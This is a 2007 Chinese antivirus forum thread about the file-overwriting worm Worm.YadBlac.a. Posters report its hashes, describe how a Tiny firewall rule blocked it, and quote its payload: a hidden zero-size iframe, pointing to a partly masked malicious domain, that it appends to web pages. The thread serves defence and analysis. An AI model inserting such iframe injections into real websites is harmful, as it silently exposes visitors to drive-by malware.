12   1  /  2  页   跳转

变态蠕虫Worm.YadBlac.a与Tiny的设置

收藏
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2007-04-14 17:37 | 只看楼主 短消息 资料
字号: 1楼

变态蠕虫Worm.YadBlac.a与Tiny的设置

从“艾玛”MM那里得到这个BT蠕虫的样本。

之所以说它BT,是因为它替换系统文件夹以外的几乎所有类型的文件(还试图替换.GHO。汗!)。

但是,在Tiny的系统权限防护中加入这么一条规则(图1),再加上文件(夹)防护规则的恰当设置,一个Tiny,就让它歇了(图2)。

可见,系统权限的防护至关重要。

我们国产的杀软何时能有这种能力啊?期盼中.........

图1

附件附件:

下载次数:280
文件类型:image/pjpeg
文件大小:
上传时间:2007-4-14 17:37:17
描述:
预览信息:EXIF信息



最后编辑2007-04-14 21:56:38
分享到:
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2007-04-14 17:37 | 只看楼主 短消息 资料
字号: 2楼

图2

附件附件:

下载次数:262
文件类型:image/pjpeg
文件大小:
上传时间:2007-4-14 17:37:59
描述:
预览信息:EXIF信息
gototop
 
艾玛
头像
大版主
  • 帖子:18894
  • 注册: 2004-01-01
  • 来自:
卡卡名人堂论坛9周年纪念
发表于: 2007-04-14 17:56 | 短消息 资料
字号: 3楼

引用:
【baohe的贴子】从“艾玛”MM那里得到这个BT蠕虫的样本。

之所以说它BT,是因为它替换系统文件夹以外的几乎所有类型的文件(还试图替换.GHO。汗!)。

但是,在Tiny的系统权限防护中加入这么一条规则(图1),再加上文件(夹)防护规则的恰当设置,一个Tiny,就让它歇了(图2)。

可见,系统权限的防护至关重要。

我们国产的杀软何时能有这种能力啊?期盼中.........

图1
………………



BLACK-DAY.EXE By : wswhacker

File Size      : 251,904 Bytes
Created Date    : 2007-4-13 16:57:22
Modified Date : 2007-4-13 16:57:22
SHA-160      : 9B4CE217FFC08BD642735CB0E7FE9C03FB10FFFF
MD5          : 50D2A304A75DC49B3AC4CC77D2614D01
CRC-32        : A73DB3B3
瑞星:Worm.YadBlac.a

传播方式:恶意网页或漏洞下载


感染.asp|.htm|.html|.aspx|.PHP|.JSP网页文件,追加<iframe src='hxxp://www.****youxi.net/index.htm' width=0 height=0></iframe>

感染破坏覆盖文件……,恢复是个难题唉……





http://hi.baidu.com/killvir/blog/item/fc7bd539f8ef77f23b87cefd.html
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2007-04-14 18:02 | 只看楼主 短消息 资料
字号: 4楼

【回复“艾玛”的帖子】
俺那图2显示:它连.txt、doc、log、.rar、.ppt、.gho文件都不放过。
之前,在影子下,去掉Tiny的那些防护,运行此蠕虫后,上述这些类型的文件确实被此蠕虫替换了(替换后文件名及其类型不变,但文件大小统统变为247K。
gototop
 
艾玛
头像
大版主
  • 帖子:18894
  • 注册: 2004-01-01
  • 来自:
卡卡名人堂论坛9周年纪念
发表于: 2007-04-14 18:10 | 短消息 资料
字号: 5楼

引用:
【baohe的贴子】【回复“艾玛”的帖子】
俺那图2显示:它连.txt、.rar、.ppt、.gho文件都不放过。
之前,在影子下,去掉Tiny的那些防护,运行此蠕虫后,上述这些类型的文件确实被此蠕虫替换了(替换后文件名及其类型不变,但文件大小统统变为247K。
………………



瑞星文章星期一才能更新哈哈:-)

88
gototop
 
33887
头像
健康舞勺狮
  • 帖子:328
  • 注册: 2006-10-23
  • 来自:
发表于: 2007-04-14 18:11 | 短消息 资料
字号: 6楼

不用担心这种鬼病毒了,宽带到期,断网闪人

最后一天来还能看到baohe的文章.受教了
gototop
 
天月来了
头像
版主
  • 帖子:76904
  • 注册: 2007-02-06
  • 来自:
发表于: 2007-04-14 18:20 | 短消息 资料
字号: 7楼

唉!

玩电脑好累哦!!!!!!!

Tiny啥时也能有个中文的。

或者真的国产的杀软也能这样优先控制所有进程,那多好。

怎么就不往这方向发展呢?

唯“很小的点”有些象了。

可是又不够霸道,在强行控制上有点含糊。
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2007-04-14 18:23 | 只看楼主 短消息 资料
字号: 8楼

引用:
【天月来了的贴子】唉!

玩电脑好累哦!!!!!!!

Tiny啥时也能有个中文的。

或者真的国产的杀软也能这样优先控制所有进程,那多好。

怎么就不往这方向发展呢?

唯“很小的点”有些象了。

可是又不够霸道,在强行控制上有点含糊。
………………

“很小的点”? 微×点
瞧瞧!这敏感词过滤把人弄得几乎不会说话了。


Tiny,一个“死”了一年多的墙!!
佩服开发者的超前眼光。
gototop
 
天月来了
头像
版主
  • 帖子:76904
  • 注册: 2007-02-06
  • 来自:
发表于: 2007-04-14 18:27 | 短消息 资料
字号: 9楼

呵呵!!!!!

好有趣!!!

知道的明白!!!

不知道的,不知会不会去百度狂搜“很小的点”?

哈哈!!!!!!!!



是哦!!
是佩服!!!!!
gototop
 
taylor05771
头像
社区嘉宾
  • 帖子:7232
  • 注册: 2003-12-24
  • 来自:
发表于: 2007-04-14 18:33 | 短消息 资料
字号: 10楼

baohe
文件发到
zhz010266@njude.com.cn

给偶看看
gototop
 
<<上一主题|下一主题>>
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT